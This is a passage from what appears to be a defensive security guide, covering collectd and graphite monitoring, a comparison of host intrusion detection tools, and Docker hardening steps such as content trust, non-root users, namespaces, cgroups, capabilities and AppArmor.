Also check the related Statistics Graphing section in the countermeasures section of the Web Applications chapter, where we introduce statsd as the collector for application metrics.
Collectd can be used to feed statistics to many consumers, including AWS CloudWatch via a plugin, but using it with graphite (and ultimately Grafana, which can take inputs from a collection of data sources, including graphite, Elasticsearch, AWS CloudWatch, and others) would provide a much better solution.
“Collectd is a daemon which collects system and application performance metrics” at a configurable frequency. Almost everything in collectd is done with plugins. Most of the over 100 plugins are used to read statistics from the target system, but plugins are also used to define where to send those statistics, and in the case of distributed systems, read those statistics sent from collectd agents. Collectd is an agent based system metrics collection tool. An agent is deployed on every host that needs to be monitored.
If you want to send statistics over the network, then the network plugin must be loaded. collectd is capable of cryptographically signing or encrypting the network traffic it transmits. Collectd is not a complete monitoring solution by itself.
The collectd daemon has no external dependencies and should run on any POSIX supporting system, such as Linux, Solaris, Mac OS X, AIX, the BSDs, and probably many others.
Graphite is a statistics storage and visualisation component which consists of:
Graphite has excellent official and community provided documentation.
There are a large number of tools that can be integrated with graphite.
Graphite can take some work to deploy. This can be made easier in several ways: you could deploy it with your favourite configuration management tool, such as with an ansible-graphite playbook, or perhaps with one of the many collectd-graphite-docker type containers.
You can even do better than graphite by adding the likes of Grafana.
Collectd can be used to send statistics locally or remotely. It can be setup as an agent and server, along with Graphite on a single machine.
Another common deployment scenario which is more interesting is to have a collection of hosts (clients/agents) that all require statistics gathering from them, and a server that listens for the data coming from all of the clients/agents. Let us see how this looks:
collectd
(which depends on collectd-core
which includes many plugins) and collectd-utils
In this case, each collectd agent sends its statistics from its Network plugin to the graphing server's network interface (achieving the same result as the below netcat command), where they are picked up by the collectd Network plugin and flow through to the collectd `write_graphite` plugin, which sends the statistics using the plain text transfer protocol (metric-name actual-value timestamp-in-epoch) to graphite's listening service called carbon (usually on port 2003). Carbon only accepts a single value per interval, which is 10 seconds by default. Carbon writes the data to the whisper library, which is responsible for storing it in its data files. graphite-web reads the data points from the whisper files, and provides the user interface and API for rendering dashboards and graphs.
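A minimal sketch of what the two ends of that flow could look like in `collectd.conf`; the host names are assumptions, and the default carbon port of 2003 is used for `write_graphite`:

```
# On each agent: ship metrics to the graphing server.
LoadPlugin network
<Plugin network>
  Server "graphing.example.local" "25826"
</Plugin>

# On the graphing server: listen for agents and forward to carbon.
LoadPlugin network
LoadPlugin write_graphite
<Plugin network>
  Listen "0.0.0.0" "25826"
</Plugin>
<Plugin write_graphite>
  <Node "local-carbon">
    Host "localhost"
    Port "2003"
    Protocol "tcp"
  </Node>
</Plugin>
```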
I also looked into Raygun which provides visibility into many aspects of your applications. Raygun is an all-in-one offering, but does not focus on server statistics.
I recently performed an in-depth evaluation of a couple of great HIDS available. The choice of which candidates to take into the second round came from an initial evaluation of a larger collection of HIDS. First I will briefly discuss the full collection I looked at, as these also have some compelling features and reasons as to why you may want to use them in your own VPSs. I will then discuss the two that I was the most impressed with, and dive into some more details around the winner, why, and how I had it configured and running in my lab.
The best time to install a HIDS is on a freshly installed system, before you open the host up to the internet or even your LAN, especially if it is corporate. Of course, if you do not have that luxury, there are a bunch of tools that can help you determine if you are already owned. Be sure to run one or more over your target system(s) before your HIDS bench-marks it, otherwise you could be bench-marking an already compromised system.
Is a HIDS that stores a good known state of vital system files of your choosing and can be set-up to notify an administrator upon change in the files. Tripwire stores cryptographic hashes (deltas) in a database and compares them with the files it has been configured to monitor changes on. DigitalOcean had a tutorial on setting Tripwire up. Most of what you will find around Tripwire now are the commercial offerings.
Is a similar offering to Tripwire for POSIX compliant systems. RkHunter scans for rootkits, backdoors and local exploits, and checks the network interfaces, by testing for:
Version 1.4.2 (24/02/2014) now checks `ssh`, `sshd` and `telnet`, although you should not have telnet installed. This could be useful for mitigating non-root users running a trojanised sshd on a port in the 1025-65535 range. You can run ad-hoc scans, then set them up to be run with cron. Debian Jessie has this release in its repository. Any Debian distro before Jessie is on 1.4.0-1 or earlier.
The latest version you can install for Linux Mint Rosa (17.3) within the repositories is 1.4.0-3 (01/05/2012); Linux Mint Sarah (18) has 1.4.2-5 within its repositories.
It is a good idea to run a couple of these types of scanners. Hopefully what one misses the other will not. Chkrootkit scans for many system programs, some of which are cron, crontab, date, echo, find, grep, su, ifconfig, init, login, ls, netstat, sshd, top and many more. All the usual targets for attackers to modify. You can specify if you do not want them all scanned. Chkrootkit runs tests such as:
While not strictly a HIDS, Unhide is quite a useful forensics tool for working with your system if you suspect it may have been compromised.
Unhide is a forensic tool to find processes and TCP/UDP ports hidden by rootkits, LKMs or other techniques. Unhide runs on Unix/Linux and Windows systems. It implements six main techniques:
- `/proc` vs `/bin/ps` output
- `/bin/ps` with info gathered by walking through the `procfs` (ONLY for unhide-linux version)
- `/bin/ps` with info gathered from `syscalls` (syscall scanning)
- Full PIDs space occupation (PIDs brute forcing) (ONLY for unhide-linux version)
- `/bin/ps` output vs `/proc`, `procfs` walking and `syscall` (ONLY for unhide-linux version). Reverse search: verify that all threads seen by `ps` are also seen in the kernel.
- `/proc`, `procfs` walking and `syscall` vs `/bin/ps` output (ONLY for unhide-linux version). This technique is about 20 times faster than tests 1+2+3 but may give more false positives.

Unhide includes two utilities: unhide and unhide-tcp.
unhide-tcp identifies TCP/UDP ports that are listening but are not listed in /bin/netstat through brute forcing of all TCP/UDP ports available.
Can also be used by rkhunter in its daily scans. Unhide was number one in the top 10 toolswatch.org security tools poll.
Is a HIDS that also has some preventative features. This is a pretty comprehensive offering with a lot of great features.
The idea of Stealth is to do a similar job to the above file integrity checkers, but to leave almost no sediments on the tested computer (called the client). A potential attacker therefore does not necessarily know that Stealth is in fact checking the integrity of its clients' files. Stealth is installed on a different machine (called the controller) and scans over SSH.
The faster you can respond to an attacker modifying system files, the more likely you are to circumvent their attempts. Ossec provides real-time checking. Stealth provides agent-less checking (it runs from another machine), using the checksum programme of your choice, which it copies to the controller on first run, ideally before the client is exposed in your DMZ.
You can find the source on github
Who is Behind Ossec?
Many developers, contributors, managers, reviewers and translators. In fact, the OSSEC team looks almost as large as the Stealth user base; well, that is a slight exaggeration.
Documentation
There is lots of documentation. It is not always the easiest to navigate, because you have to understand so much up front. There is lots of buzz on the inter-webs and there are several books.
Community / Communication
IRC channel #ossec on irc.freenode.org, although it is not very active.
Components
There are quite a few other ancillary components also.
You can also go the agent-less route, which may allow the Manager to perform file integrity checks using agent-less scripts. As with Stealth, you still have the issue of needing to be root in order to read some of the files.
Agents can be installed on VMware ESX but from what I have read it is quite a bit of work.
Features in a nut-shell
What I like
To me, the ability to scan in real-time off-sets the fact that the agents in most cases have binaries installed. This hinders the attacker from covering their tracks.
Can be configured to scan systems in real-time based on inotify events.
Backed by a large company, Trend Micro.
Options: Install options for starters. You have the options of:
Can install a web UI on the manager, so you need Apache, PHP, MySQL.
If you are going to be checking many machines, OSSEC will scale.
What I like less
And why it rose to the top.
You can find the source on github
Who is Behind Stealth?
Author: Frank B. Brokken. An admirable job for one person. Frank is not a fly-by-nighter though; Stealth was first presented to Congress in 2003, and it is still actively maintained and used by a few. It is one of GNU/Linux's dirty little secrets, I think: a great idea, well implemented, that makes a tricky job simple and does it in an elegant way.
All hosted on github.
Once you install Stealth, all the documentation can be found by running `sudo updatedb && locate stealth`. I most commonly used the HTML docs at `/usr/share/doc/stealth-doc/manual/html/`, and `/usr/share/doc/stealth-doc/manual/pdf/stealth.pdf` for easy searching across the HTML docs.
/usr/share/doc/stealth/stealthman.html
/usr/share/doc/stealth/examples/
Binaries
Debian Stretch: has 4.01.05-1
Linux Mint 18 (Sarah) has 4.01.04-1
Last time I installed Stealth I had to either go out of band to get a recent version or go with a much older version. These repositories now have very recent releases though.
Community / Communication
There is no community really. I see it as one of the dirty little secrets that I am surprised many diligent sys-admins have not jumped on. The author is happy to answer emails. The author is more focussed on maintaining a solid product than on marketing.
Components
Architecture
The Monitor stores one to many policy files, each of which is specific to a single client and contains `USE` directives and commands. It is recommended policy to take copies of the client utilities, such as the hashing programme `sha1sum`, `find` and others that are used extensively during the integrity scans, and copy them to the Monitor to take bench-mark hashes. Subsequent runs will do the same, to compare with the initial hashes stored, before the client utilities are trusted.
Features in a nut-shell
File integrity tests leaving virtually no sediments on the tested client.
Stealth subscribes to the “dark cockpit” approach, i.e. no mail is sent when no changes are detected. If you have an MTA, Stealth can be configured to send emails on changes it finds.
What I like
- If an attacker modifies the likes of `sha1sum` on the clients that Stealth uses to perform its integrity checks, Stealth would somehow have to be fooled into thinking that the changed hash of the `sha1sum` it has just copied to the Monitor is the same as the previously recorded hash that it did the same with. If the previously recorded hash is removed or does not match the current hash, then Stealth will fire an alert off.
- The only real trace left on the client is a login entry in `auth.log`. This could actually be months ago, as the connection remains active for the life of Stealth. The login could be from a user doing anything on the client. It is very discrete.
- Scan runs can be randomised with the `--random-interval` and `--repeat` options. E.g. `--repeat 60 --random-interval 30` results in new Stealth-runs on average every 75 seconds. It can usually take a couple of minutes to check all the important files on a file system, so you would probably want to make the checks several minutes apart from each other.

What I like less
In making all of my considerations, I changed my mind quite a few times on which offerings were most suited to which environments. I think this is actually a good thing, as I think it means my evaluations were based on the real merits of each offering rather than any biases.
The simplicity of Stealth, its flatter learning curve, and its overall philosophy are what won me over. Although, if you have to monitor many Agents / Clients, then Ossec would be an excellent option, as I think it would scale well.
I installed stealth and stealth-doc via the Synaptic package manager, then just did a `locate` for stealth to find the docs and other example files. The following are the files I used for documentation, how I used them, and the tab order that made sense to me:
The files I would need to copy and modify were:
/usr/share/doc/stealth/scripts/usr/bin/stealthcleanup.gz
/usr/share/doc/stealth/scripts/usr/bin/stealthcron.gz
/usr/share/doc/stealth/scripts/usr/bin/stealthmail.gz
Files I used for reference to build up the policy file:
/usr/share/doc/stealth/examples/demo.pol.gz
/usr/share/doc/stealth/examples/localhost.pol.gz
/usr/share/doc/stealth/examples/simple.pol.gz
As mentioned above, providing you have a working MTA, Stealth will just do its thing when you run it. The next step is to schedule its runs; this can also be done (as mentioned above) with a pseudo-random interval.
It is my intention to provide a high-level overview of the concepts you will need to know in order to establish a somewhat secure environment around the core Docker components and your containers. There are many resources available, and the Docker security team is hard at work constantly trying to make the task of improving security around Docker easier.
Do not forget to check the Additional Resources section for material to be consumed in parallel with the Docker Countermeasures, such as the excellent CIS Docker Benchmark and an interview of the Docker Security Team Lead I carried out with Diogo Mónica.
Cisecurity has an excellent resource for hardening docker images which the Docker Security team helped with.
“Docker Security Scanning is available as an add-on to Docker hosted private repositories on both Docker Cloud and Docker Hub.”, you also have to opt in and pay for it. Docker Security Scanning is also now available on the new Enterprise Edition. The scan compares the SHA of each component in the image with those in an up to date CVE database for known vulnerabilities. This is a good start, but not free and does not do enough. Images are scanned on push and the results indexed so that when new CVE databases are available, comparisons can continue to be made.
It’s up to the person consuming images from docker hub to assess whether or not they have vulnerabilities in them. Whether un-official or official, it is your responsibility. Check the Hardening Docker Host, Engine and Containers section for tooling to assist with finding vulnerabilities in your Docker hosts and images.
Your priority, before you start testing images for vulnerable contents, is to understand the following:
Images can be pulled by their content-addressable digest (`sha256:<the-hash>`) rather than by tag, so you get exactly the image you expect. To use Docker Content Trust, the `DOCKER_CONTENT_TRUST` environment variable must be set to `1`, and the `DOCKER_CONTENT_TRUST_SERVER` must be set to the URL of the Notary server you set up.
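As a sketch, enabling this for the current shell session could look like the following; the Notary server URL is an assumption (Docker Hub's is https://notary.docker.io):

```
export DOCKER_CONTENT_TRUST=1
export DOCKER_CONTENT_TRUST_SERVER=https://notary.docker.io
# With content trust enabled, pushes are signed and pulls of unsigned images will fail.
```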
Now the producer can sign their image, but first, they need to generate a key pair. Once they have done that, when the image is pushed to the registry, it is signed with their private (tagging) key.
When the image consumer pulls the signed image, Docker Engine uses the publisher's public (tagging) key to verify that the image they are about to run is cryptographically identical to the image the publisher pushed.
Docker Content Trust also uses the Timestamp key when publishing the image; this makes sure that the consumer is getting the most recent image on pull.
Notary is based on a Go implementation of The Update Framework (TUF)
Specify the image digest in the `FROM` instruction in your `Dockerfile`, so that when you `pull`, the same image will be fetched.
If you are already doing the last step from above, then fetching an image with a very similar name becomes highly unlikely.
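A hypothetical example of pinning a base image by digest in a `Dockerfile`; the image name is an assumption and the digest is a placeholder only:

```
FROM debian@sha256:<the-hash>
```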
In order to run containers as a non-root user, the user needs to be added in the (preferably base) image (Dockerfile
) if it is under your control, and set before any commands you want run as a non-root user. Here is an example of the NodeGoat image:
As you can see on line 4 we create our nodegoat_docker
user.
On line 8 we add our non-root user to the image with no ability to login.
On line 15 we change the ownership of the `$workdir` so our non-root user has access to do the things that we normally have permissions to do without root, such as installing npm packages and copying files, as we see on lines 20 and 21; but first we need to switch to our non-root user on line 18. On lines 25 and 26 we need to reapply ownership and permissions, due to the fact that Docker does not `COPY` according to the user you are set to run commands as.
Without reapplying the ownership and permissions of the non-root user as seen above on lines 25 and 26, the container directory listings would look like this:
With reapplication of the ownership and permissions of the non-root user, as the Dockerfile
is currently above, the container directory listings look like the following:
An alternative to setting the non-root user in the `Dockerfile` is to set it in the `docker-compose.yml`, providing the non-root user has been added to the image in the `Dockerfile`. In the case of NodeGoat, the mongo `Dockerfile` is maintained by DockerHub, and it adds a user called `mongodb`. Then in the NodeGoat project's `docker-compose.yml`, we just need to set the user, as seen on line 13 below:
Alternatively, a container may be run as a non-root user by
docker run -it --user lowprivuser myimage
but this is not ideal; the specific user should usually be part of the build.
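To tie the above together, the following is a generic, hedged sketch (not the NodeGoat `Dockerfile` itself) of adding a non-root user as part of the build; the user, group, paths and command are all assumptions:

```
FROM node:argon
# Add a system user and group with no ability to login.
RUN groupadd --system app && \
    useradd --system --gid app --shell /usr/sbin/nologin app
RUN mkdir -p /usr/src/app
WORKDIR /usr/src/app
COPY . /usr/src/app
# COPY runs as root regardless of USER, so reapply ownership before dropping privileges.
RUN chown -R app:app /usr/src/app
USER app
CMD ["node", "server.js"]
```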
Make sure you keep your host kernel well patched, as it is a huge attack surface, with all of your containers accessing it via System calls.
The space for tooling to help find vulnerabilities in code, packages, etc. within your Docker images has been noted, and tools provided. The following list is sorted from what feels like it does the least and is the simplest in terms of security/hardening features, to what does the most, without understating the tools that do a little but do it well.
These tools should form a part of your secure and trusted build pipeline / software supply-chain.
“A smarter Dockerfile linter that helps you build best practice Docker images.”
is a mature, free and open source auditing tool for Linux/Unix based systems. There is a Docker plugin available which allows one to audit Docker, its configuration and containers, but an enterprise license is required, although it is very cheap.
is a shell script, that can be downloaded from github and executed immediately, run from a pre-built container, or using Docker Compose after git cloning. Docker Bench tests many host configurations and Docker containers against the CIS Docker Benchmark.
is an open source project that appears to do a similar job to Docker Security Scanning, but it is free. You can use it on any image you pull, to compare the hashes of the packages from every container layer within, with hashes of the CVE data sources. You could also use Clair on your CI/CD build to stop images being deployed if they have packages with hashes that match those of the CVE data sources. quay.io was the first container registry to integrate with Clair.
is a free and open source framework for static analysis of Docker images. It does more than Clair: it can optionally communicate with Docker registries, private or Docker Hub, to obtain image hashes, and it can then tell the Docker daemon to pull the images locally. Collector then `docker run`'s each container in turn to be inspected. Each container runs a banyan or user-specified script which outputs its results to stdout. Collector collates the containers' output, and can send this to Banyan Analyser for further analysis. Collector has a pluggable, extensible architecture. Collector can also enforce policies, such as no unauthorised user accounts, etc., and make sure components are in their correct location. Banyanops was the organisation that blogged about the high number of vulnerable packages on Docker Hub. They have really put their money where their mouth is.
is a set of non-free tools providing visibility, control, analytics, compliance and governance for containers in the cloud or on-prem.
There are two main parts, a hosted web service, and a set of open source CLI query tools.
The hosted service selects and analyses popular container images from Docker Hub and other registries. The metadata it creates is provided as a service to the on-premise CLI tools.
It performs a similar job to that of Clair, but does not look as simple. Also looks for source code secrets, API keys, passwords, etc in images.
Designed to integrate into your CI/CD pipeline. Integrates with Kubernetes, Docker, Jenkins, CoreOS, Mesos
is a fairly comprehensive and complete non open source offering with a free developer edition. The following details were taken from TwistLock marketing pages:
Features of Trust:
Features of Runtime:
`mnt`: Keep with the default propagation mode of `private` unless you have a very good reason to change it. If you do need to change it, think about defence in depth and employ other defence strategies.
If you have control over the Docker host, lock down the mounting of the host systems partitions as discussed in the Lock Down the Mounting of Partitions section.
If you have to mount a sensitive host system directory, mount it as read-only:
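A minimal sketch of such a mount; the image name is an assumption:

```
docker run -it --rm -v /etc:/etc:ro debian /bin/bash
```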
If any file modifications are now attempted on /etc
they will be unsuccessful.
Also, as discussed previously, lock down the user to non-root.
If you are using LSM, you will probably want to use the Z
option as discussed in the risks section.
`PID`: By default, Docker enforces isolation of the container's PID namespace from other containers, but not from the host to the container. If you are concerned about host systems being able to access your containers, as you should be, consider putting your containers within a VM.
`net`: A network namespace is a virtualisation of the network stack, with its own network devices, IP routing tables, firewall rules and ports. When the last process in a network namespace terminates, the namespace will be destroyed, destroying any virtual interfaces within it and moving any physical network devices back to the initial network namespace (not to the process parent).
Docker and Network Namespaces
A Docker network is analogous to a Linux kernel network namespace.
When Docker is installed, three networks are created: `bridge`, `host` and `none` (which uses the `null` driver); you can think of these as network namespaces. They can be seen by running `docker network ls`.
When you run a container, if you want to override the default network of `bridge`, you can specify which network you want to run the container in with the `--network` flag, as follows:
docker run --network=<network>
The bridge can be seen by running ifconfig
on the host:
When the Docker engine (CLI) client or API tells the Docker daemon to run a container, part of the process allocates a bridged interface, unless specified otherwise, that allows processes within the container to communicate to the system host via the virtual Ethernet bridge.
Virtual Ethernet interfaces are always created as a pair. You can think of them as one interface on each side of a namespace wall, with a tube through the wall connecting them. Packets come in one interface and pop out the other, and vice versa.
Creating and Listing Network NameSpaces
Some of these commands you will need to run as root.
Create:
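Presumably something along these lines, run as root; the namespace name matches the explanation below:

```
ip netns add testnamespace
ip netns list
```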
This `ip` command adds a bind mount point for the `testnamespace` namespace to `/var/run/netns/`. When the `testnamespace` namespace is created, the resulting file descriptor keeps the network namespace alive/persisted. This allows system administrators to apply configuration to the network namespace without fear that it will disappear when no processes are within it.
A network namespace added in this way, however, can not be used for a Docker container. In order to create a Docker network called `kimsdockernet`, run the following command:
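Presumably along the lines of the following; the bridge driver is used if none is specified:

```
docker network create kimsdockernet
```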
You can then follow this with a `docker network ls` to confirm that the network was added. You can base your network on one of the existing network drivers created by Docker; the bridge driver is used by default.
`bridge`: As seen above with the `ifconfig` listing on the host system, an interface called docker0 is created when Docker is installed. A pair of veth (Virtual Ethernet) interfaces are created when the container is run with this `--network` option. The `veth` on the outside of the container will be attached to the bridge; the other `veth` is put inside the container's namespace, along with the existing loopback interface.
`none`: There will be no networking in the container other than the loopback interface, which was created when the network namespace was created, and which has no routes to external traffic.
`host`: Use the network stack that the host system uses, inside the container. The `host` mode is more performant than the `bridge` mode due to using the host's native network stack, but it is also less secure.
`container`: Allows you to specify another container to use its network stack.
By running
docker network inspect kimsdockernet
before starting the container and then again after, you will see the new container added to the kimsdockernet
network.
Now you can run your container using your new network:
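For example (the image is an assumption; the container name matches the one referred to below):

```
docker run -it --name container0 --network=kimsdockernet debian /bin/bash
```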
When one or more processes (Docker containers in this case) use the kimsdockernet
network, it can also be seen opened by the presence of its file descriptor at:
/var/run/docker/netns/<filedescriptor>
You can also see that the container named container0
has a network namespace by running the following command, which shows the file handles for the namespaces, and not just the network namespace:
If you run
ip netns list
again, you may think that you should be able to see the Docker network, but you will not, unless you create the following symlink:
If you want to run a command inside of the Docker network of a container, you can use the nsenter
command of the util-linux
package:
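A sketch of how that might look; the container name follows the example above and the `ip addr` command is just illustrative:

```
# Find the host PID of the container's main process, then enter its network namespace.
PID=$(docker inspect --format '{{.State.Pid}}' container0)
nsenter --target "$PID" --net ip addr
```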
Deleting Network NameSpaces
The following command will remove the bind mount for the specified namespace. The namespace will continue to persist until all processes within it are terminated, at which point any virtual interfaces within it will be destroyed and any physical network devices if they were assigned, would be moved back to the initial network namespace, not the process parent.
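Presumably the commands in question look like the following, using the namespace and network names from the examples above:

```
ip netns delete testnamespace
# And for the Docker network; this will fail while containers are still attached to it:
docker network rm kimsdockernet
```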
If you still have a container running, you will receive an error:
Error response from daemon: network kimsdockernet has active endpoints
Stop your container and try again.
It would also pay to understand how containers communicate with each other.
Also checkout the Additional Resources.
`UTS`: Do not start your containers with the `--uts` flag set to `host`, as doing so shares the host's UTS namespace with the container.
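Shown below purely as an example of what not to do (the image is an assumption):

```
# Sharing the host's UTS namespace lets the container change the host's hostname.
docker run -it --uts=host debian /bin/bash
```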
`IPC`: In order to stop another untrusted container sharing your container's IPC namespace, you could isolate all of your trusted containers in a VM, or, if you are using some type of orchestration, that will usually have functionality to isolate groups of containers. If you can isolate your trusted containers sufficiently, then you may still be able to share the IPC namespace with other nearby containers.
`user`: If you have read the risks section and still want to enable support for user namespaces, you first need to confirm that the host user of the associated container's PID is not root, by running the following CIS Docker Benchmark recommended commands:
Or, you can run the following command and make sure that `userns` is listed under the `SecurityOptions`:
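A sketch of that check:

```
docker info --format '{{ .SecurityOptions }}'
```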
Once you have confirmed that your containers are not being run as root, you can look at enabling user namespace support on the Docker daemon.
The /etc/subuid
and /etc/subgid
host files will be read for the user and optional group supplied to the --userns-remap
option of dockerd
.
The --userns-remap
option accepts the following value types:
uid
uid:gid
username
username:groupname
The username must exist in the `/etc/passwd` file; the `sbin/nologin` users are valid also. Subordinate user Id and group Id ranges need to be specified in `/etc/subuid` and `/etc/subgid` respectively.
“The UID/GID we want to remap to does not need to match the UID/GID of the username in `/etc/passwd`”. It is the entity in `/etc/subuid` that will be the owner of the Docker daemon and the containers it runs. The value you supply to `--userns-remap`, if numeric Ids, will be translated back to the valid user or group names of `/etc/passwd` and `/etc/group`, which must exist; if you supply a username and groupname, they must match the entities in `/etc/passwd`, `/etc/subuid`, and `/etc/subgid`.
Alternatively if you do not want to specify your own user and/or user:group, you can provide the default
value to --userns-remap
, and a default user of dockremap
along with subordinate uid and gid ranges will be created in /etc/passwd
and /etc/group
if it does not already exist. Then the /etc/subuid
and /etc/subgid
files will be populated with a contiguous 65536 length range of subordinate user and group Ids respectively, starting at the offset of the existing entries in those files.
If dockremap
does not already exist, it will be created:
There are rules around providing multiple range segments in the `/etc/subuid` and `/etc/subgid` files, but that is beyond the scope of what I am providing here. For those advanced scenario details, check out the Docker engine reference. The simple scenario is that we use a single contiguous range like you see in the above example; this will cause Docker to map the container's user and group Ids onto the host's subordinate range, using as much of the `165536:65536` range as necessary. So, for example, the container's root user would be mapped to host uid `165536`, the container's next user to `165537`, and so on, until the 65536 possible Ids are all mapped. Processes run as root inside the container are owned by the subordinate uid outside of the container.
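For completeness, a minimal sketch of enabling the default remapping; whether you use the command line flag or the daemon configuration file is up to you:

```
# Either start the daemon with the flag...
dockerd --userns-remap=default
# ...or, equivalently, set it in /etc/docker/daemon.json:
#   { "userns-remap": "default" }
```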
Disabling user namespace for specific containers
In order to disable user namespace mapping on a per-container basis once it has been enabled for the Docker daemon, you could supply the `--userns=host` value to either of the `run`, `exec` or `create` Docker commands. This would mean the default user within the container was mapped to the host's root.
Use cgroups to limit, track and monitor the resources available to each container at each nested level. Docker makes applying resource constraints very easy. Check the Runtime constraints on resources Docker engine run reference documentation, which covers applying constraints such as:
For additional details on setting these types of resource limits, also refer to the Limit a container's resources Admin Guide for Docker Engine. Basically, when you `run` a container, you simply provide any number of the runtime configuration flags that control the underlying cgroup system resources. Cgroup resources can not be set if a process is not running; that is why we optionally pass the flag(s) at run-time, or alternatively manually change the cgroup settings once a process (or Docker container in our case) is running. We can make manual changes on the fly by directly modifying the cgroup resource files. These files are stored in the container's cgroup directories shown in the output of the `/sys/fs/cgroup find -name "4f1f200ce13f2a7a180730f964c6c56d25218d6dd40b027c7b5ee1e551f4eb24"` command below. These files are ephemeral for the life of the process (Docker container in our case).
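As a hedged example, a few such flags applied at run time might look like this; the image and values are arbitrary:

```
docker run -it --memory=256m --cpu-shares=512 --pids-limit=100 debian /bin/bash
```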
By default Docker uses the cgroupfs cgroup driver to interface with the Linux kernel’s cgroups. You can see this by running docker info
. The Linux kernel’s cgroup interface is provided through the cgroupfs pseudo-filesystem /sys/fs/cgroup
on the host filesystem of recent Linux distributions. The /proc/cgroups
file contains information about the system's controllers compiled into the kernel. This file on my test system looks like the following:
The fields represent the following:
- `subsys_name`: The name of the controller
- `hierarchy`: Unique Id of the cgroup hierarchy
- `num_cgroups`: The number of cgroups in the specific hierarchy using this controller
- `enabled`: 1 == enabled, 0 == disabled

If you run a container like the following:
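For example (the image is an assumption; the container name matches the examples that follow):

```
docker run -d --name cgroup-test nginx
```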
Cgroups for your containers and the system resources controlled by them will be stored as follows:
Docker also keeps track of the cgroups in
/sys/fs/cgroup/[resource]/docker/[containerId]
You will notice that Docker creates cgroups using the container Id.
If you want to manually create a cgroup and have your containers hierarchically nested within it, you just need to `mkdir` a directory within `/sys/fs/cgroup/` (you will probably need to be root for this), which makes and populates the directory and also sets up the cgroup, like the following:
Now you can run a container with cg1
as your cgroup parent:
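A sketch using the `--cgroup-parent` flag; the image is an assumption and the container name matches the text below:

```
docker run -d --name cgroup-test1 --cgroup-parent=cg1 nginx
```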
Now that Docker has your container named cgroup-test1
running, you will be able to see the nested cgroups:
You can also run containers nested below already running containers' cgroups; let us take the container named `cgroup-test` for example:
Now your new container named cgroup-test2
will have a set of nested cgroups within each of the:
93cb84d30291201a84d5676545015220696dbcc72a65a12a0c96cda01dd1d270
directories shown here:
You should see the same result if you have a look in the running container’s
/proc/self/cgroup
file.
Within each cgroup resides a collection of files specific to the controlled resource; some of these are used to limit aspects of the resource, and some are used for monitoring aspects of the resource. What they are should be fairly obvious, based on their names. You can not exceed the resource limits of the cgroup that your cgroup is nested within. There are ways in which you can get visibility into any container's resource usage. One quick and simple way is with the `docker stats [containerId]` command, which will give you a line with your container's CPU usage, memory usage and limit, Net I/O, Block I/O, and number of PIDs. There are many other sources of container resource usage; check the Docker engine runtime metrics documentation for additional details.
The most granular information can be found in the statistical files within the cgroup directories listed above.
The /proc/[pid]/cgroup
file provides a description of the cgroups that the process with the specified PID belongs to. You can see this in the following cat
output. The information provided is different for cgroups version 1 and version 2 hierarchies; for this example, we are focussing on version 1. Docker abstracts all of this anyway, so it is just to show you how things hang together:
Each row of the above file depicts one of the cgroup hierarchies that the process, or Docker container in our case, is a member of. The row consists of three fields separated by colons, in the form:
`hierarchy-Id:list-of-controllers-bound-to-hierarchy:cgroup-path`
If you remember back to where we looked at the `/proc/cgroups` file above, you will notice that the `hierarchy-Id` corresponds to the hierarchy Id listed in `/proc/cgroups`. The third field contains, relative to the mount point of the hierarchy, the pathname of the cgroup in the hierarchy to which the process belongs. You can see this reflected in the `/sys/fs/cgroup find -name "93cb84d30291*"` output.
Fork Bomb from Container
With a little help from the CIS Docker Benchmark, we can use the PIDs cgroup limit:
Run your containers with `--pids-limit` (kernel version 4.3+) and set a sensible value for the maximum number of processes that the container can run, based on what the container is expected to be doing. By default, the PidsLimit value displayed with the following command will be 0; 0 or -1 means that any number of processes can be forked within the container:
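A sketch of both the audit and the run command; the exact CIS wording may differ, and the image and limit value are assumptions:

```
# Audit the PidsLimit of all containers:
docker ps --quiet --all | xargs docker inspect --format '{{ .Id }}: PidsLimit={{ .HostConfig.PidsLimit }}'
# Run a container with a sensible limit:
docker run -d --pids-limit 100 nginx
```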
There are several ways you can minimise the set of capabilities that the root user of the container will run with. `pscap` is a useful command from the `libcap-ng-utils` package in Debian and some other distributions. Once installed, you can check which capabilities your container built from the `<amazing>` image runs with, by:
In order to drop the capabilities `setfcap`, `audit_write`, and `mknod`, you could run:
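Something along these lines, using the `--cap-drop` flag; the `<amazing>` image and the command are placeholders:

```
docker run -it --cap-drop setfcap --cap-drop audit_write --cap-drop mknod <amazing> /bin/bash
```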
Or just drop all capabilities and only add what you need:
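For example (again, the image and the capability to add back are placeholders):

```
docker run -it --cap-drop ALL --cap-add <only-what-you-need> <amazing> /bin/bash
```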
Another way of auditing the capabilities of your container is with the following command from CIS Docker Benchmark:
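A sketch of that kind of audit, which may not match the CIS wording exactly:

```
docker ps --quiet --all | xargs docker inspect --format '{{ .Id }}: CapAdd={{ .HostConfig.CapAdd }} CapDrop={{ .HostConfig.CapDrop }}'
```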
Alternatively you can modify the container manifest directly. See the runC section for this.
Linux Security Modules (LSM) is a framework that has been part of the Linux kernel since 2.6, that supports security models implementing Mandatory Access Control (MAC). The currently accepted modules are AppArmor, SELinux, Smack and TOMOYO Linux.
At the first Linux kernel summit in 2001, “Peter Loscocco from the National Security Agency (NSA) presented the design of the mandatory access control system in its SE Linux distribution.” SE Linux had implemented: Many check points where authorization to perform a particular task was controlled, and a security manager process which implements the actual authorization policy. “The separation of the checks and the policy mechanism is an important aspect of the system - different sites can implement very different access policies using the same system.” The aim of this separation is to make it harder for the user to not adjust or override policies.
It was realised that there were several security related projects trying to solve the same problem. It was decided to have the developers interested in security create a “generic interface which could be used by any security policy. The result was the Linux Security Modules (LSM)” API/framework, which provides many hooks at security critical points within the kernel.
LSMs can register with the API and receive callbacks from these hooks when the Unix Discretionary Access Control (DAC) checks succeed, allowing the LSMs Mandatory Access Control (MAC) code to run. The LSMs are not loadable kernel modules, but instead selectable at build-time via CONFIG_DEFAULT_SECURITY
which takes a comma separated list of LSM names. Commonly multiple LSMs are built into a given kernel and can be overridden at boot-time via the security=...
kernel command line argument, also taking a comma separated list of LSM names.
If no specific LSMs are built into the kernel, the default LSM will be the Linux capabilities. “Most LSMs choose to extend the capabilities system, building their checks on top of the defined capability hooks.” A comma separated list of the active security modules can be found in /sys/kernel/security/lsm
. The list reflects the order in which checks are made, the capability module will always be present and be the first in the list.
AppArmor LSM in Docker
If you intend to use AppArmor, make sure it is installed, and that you have a policy loaded (`apparmor_parser -r [/path/to/your_policy]`) and enforced (`aa-enforce`).
AppArmor policies are created using the profile language. Docker will automatically generate and load a default AppArmor policy, `docker-default`, when you run a container. If you want to override the policy, you do this with the `--security-opt` flag, like:
docker run --security-opt apparmor=your_policy [container-name]
